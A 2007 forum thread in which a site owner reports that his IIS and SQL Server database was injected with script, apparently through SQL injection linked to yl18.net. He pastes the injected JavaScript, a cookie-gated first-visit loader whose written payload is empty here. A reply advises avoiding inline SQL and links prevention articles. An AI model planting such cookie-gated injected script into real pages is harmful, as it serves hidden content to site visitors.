IIS - SQL Tables Hacked - http://yl18.net/

IIS - SQL Tables Hacked - http://yl18.net/

am 06.11.2007 09:38:14 von peterjonesp1

On my personal IIS and SQL server running my hobby homepages had a
leave me a message set of questions and managed to get my database
tables uploaded with -

This brought my whole system down, I assumed I had full SQL Inject
validation and IIS patching, anyone know of any new vulnerabilies or
suffered the same attack?

Peter.

"function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}

function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}

function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" +
exp.toGMTString();
}
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*8*60*60*1000));

function amt(){
var count = GetCookie('count');
//var count;
//alert(count);
//count = null;
if(count == null) {
SetCookie('count','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('count',newcount,exp);
//DeleteCookie('count')
return newcount
}
}

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function sethome(){
document.write('');
document.write('');

}
if(amt()==1)
{

sethome()
}
document.write('');"

Re: IIS - SQL Tables Hacked - http://yl18.net/

am 08.11.2007 19:54:01 von Rick Barber

There really is no fool proof way that IIS can protect against everything.
If you truly suffered a SQL injection attack, it could have easily been done
of you are using inline sql statements in your code:

http://www.wwwcoder.com/main/parentid/258/site/2966/68/defau lt.aspx
http://www.4guysfromrolla.com/webtech/061902-1.shtml

Those two articles both give great examples and information on how you can
code your pages to minimize and probably prevent SQL injection attacks
entirely.

--
Rick Barber

http://www.orcsweb.com
Managed Complex Hosting
#1 in Service and Support

wrote in message
news:1194338294.344607.113420@22g2000hsm.googlegroups.com...
> On my personal IIS and SQL server running my hobby homepages had a
> leave me a message set of questions and managed to get my database
> tables uploaded with -
>
> This brought my whole system down, I assumed I had full SQL Inject
> validation and IIS patching, anyone know of any new vulnerabilies or
> suffered the same attack?
>
> Peter.
>
> "function GetCookie (name) {
> var arg = name + "=";
> var alen = arg.length;
> var clen = document.cookie.length;
> var i = 0;
> while (i < clen) {
> var j = i + alen;
> if (document.cookie.substring(i, j) == arg)
> return getCookieVal (j);
> i = document.cookie.indexOf(" ", i) + 1;
> if (i == 0) break;
> }
> return null;
> }
>
> function SetCookie (name, value) {
> var argv = SetCookie.arguments;
> var argc = SetCookie.arguments.length;
> var expires = (argc > 2) ? argv[2] : null;
> var path = (argc > 3) ? argv[3] : null;
> var domain = (argc > 4) ? argv[4] : null;
> var secure = (argc > 5) ? argv[5] : false;
> document.cookie = name + "=" + escape (value) +
> ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
> ((path == null) ? "" : ("; path=" + path)) +
> ((domain == null) ? "" : ("; domain=" + domain)) +
> ((secure == true) ? "; secure" : "");
> }
>
> function DeleteCookie (name) {
> var exp = new Date();
> exp.setTime (exp.getTime() - 1);
> // This cookie is history
> var cval = 0;
> document.cookie = name + "=" + cval + "; expires=" +
> exp.toGMTString();
> }
> var expDays = 1;
> var exp = new Date();
> exp.setTime(exp.getTime() + (expDays*8*60*60*1000));
>
> function amt(){
> var count = GetCookie('count');
> //var count;
> //alert(count);
> //count = null;
> if(count == null) {
> SetCookie('count','1')
> return 1
> }
> else{
> var newcount = parseInt(count) + 1;
> if(newcount<2) count=1;
> SetCookie('count',newcount,exp);
> //DeleteCookie('count')
> return newcount
> }
> }
>
> function getCookieVal(offset) {
> var endstr = document.cookie.indexOf (";", offset);
> if (endstr == -1)
> endstr = document.cookie.length;
> return unescape(document.cookie.substring(offset, endstr));
> }
> function sethome(){
> document.write('');
> document.write('');
>
> }
> if(amt()==1)
> {
>
> sethome()
> }
> document.write('');"
>